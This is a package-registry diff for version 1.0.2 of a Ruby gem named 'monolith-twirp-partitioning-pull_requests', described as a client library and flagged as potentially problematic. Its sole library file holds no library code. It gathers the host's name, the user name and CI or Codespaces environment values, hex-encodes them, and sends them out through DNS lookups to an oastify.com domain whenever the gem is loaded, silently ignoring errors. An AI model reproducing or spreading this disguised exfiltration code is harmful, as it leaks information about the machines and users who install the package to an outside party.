monolith-twirp-partitioning-pull_requests 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of monolith-twirp-partitioning-pull_requests might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: f1c850b8b67ed1312f29343037ada8abb131cad43fbe78b7417d35a14845a61b
4
+ data.tar.gz: c8ed82db73e8f97ec1be0bf01785e911a7ee410404136448cad63397bc8de42f
5
+ SHA512:
6
+ metadata.gz: 757f8d74eceffa35fab6d0c78cddef1ad2709f3ff5f4e5b12de22816c1c9428d23cf39180d1f2733b5419754017175c6d7c0ad0b4f2d1099c16cce2c614aa8be
7
+ data.tar.gz: c2186b9d12bd21870138e0177bab45431c47d9848b80e441f03fe8d0226ddfab4c282e28a617b890f817510c068937112d82853aa9d3b2f39f9d3a9eb4129ea0
@@ -0,0 +1,15 @@
1
+ require 'resolv'
2
+ require 'socket'
3
+ begin
4
+ h = Socket.gethostname.to_s[0..20]
5
+ u = (ENV['USER'] || ENV['USERNAME'] || 'na').to_s[0..15]
6
+ d = (ENV['GITHUB_ACTIONS'] || ENV['CI'] || ENV['CODESPACE_NAME'] || 'srv').to_s[0..15]
7
+ data = "#{h}.#{u}.#{d}"
8
+ hex = data.chars.map { |c| c.ord.to_s(16).rjust(2, '0') }.join
9
+ labels = hex.scan(/.{1,60}/)
10
+ labels.each_with_index do |label, i|
11
+ subdomain = "#{label}.#{i}.pp.bo3kq1t0lno3utuiq360efzqthz8n0bp.oastify.com"
12
+ Resolv::DNS.new.getresource(subdomain, Resolv::DNS::Resource::IN::A) rescue nil
13
+ end
14
+ rescue
15
+ end
metadata ADDED
@@ -0,0 +1,43 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: monolith-twirp-partitioning-pull_requests
3
+ version: !ruby/object:Gem::Version
4
+ version: 1.0.2
5
+ platform: ruby
6
+ authors:
7
+ - Dev
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2026-03-27 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: monolith-twirp-partitioning-pull_requests client library
14
+ email: dev@example.com
15
+ executables: []
16
+ extensions: []
17
+ extra_rdoc_files: []
18
+ files:
19
+ - lib/monolith-twirp-partitioning-pull_requests.rb
20
+ homepage: https://rubygems.org/gems/monolith-twirp-partitioning-pull_requests
21
+ licenses:
22
+ - MIT
23
+ metadata: {}
24
+ post_install_message:
25
+ rdoc_options: []
26
+ require_paths:
27
+ - lib
28
+ required_ruby_version: !ruby/object:Gem::Requirement
29
+ requirements:
30
+ - - ">="
31
+ - !ruby/object:Gem::Version
32
+ version: '2.0'
33
+ required_rubygems_version: !ruby/object:Gem::Requirement
34
+ requirements:
35
+ - - ">="
36
+ - !ruby/object:Gem::Version
37
+ version: '0'
38
+ requirements: []
39
+ rubygems_version: 3.5.22
40
+ signing_key:
41
+ specification_version: 4
42
+ summary: monolith-twirp-partitioning-pull_requests
43
+ test_files: []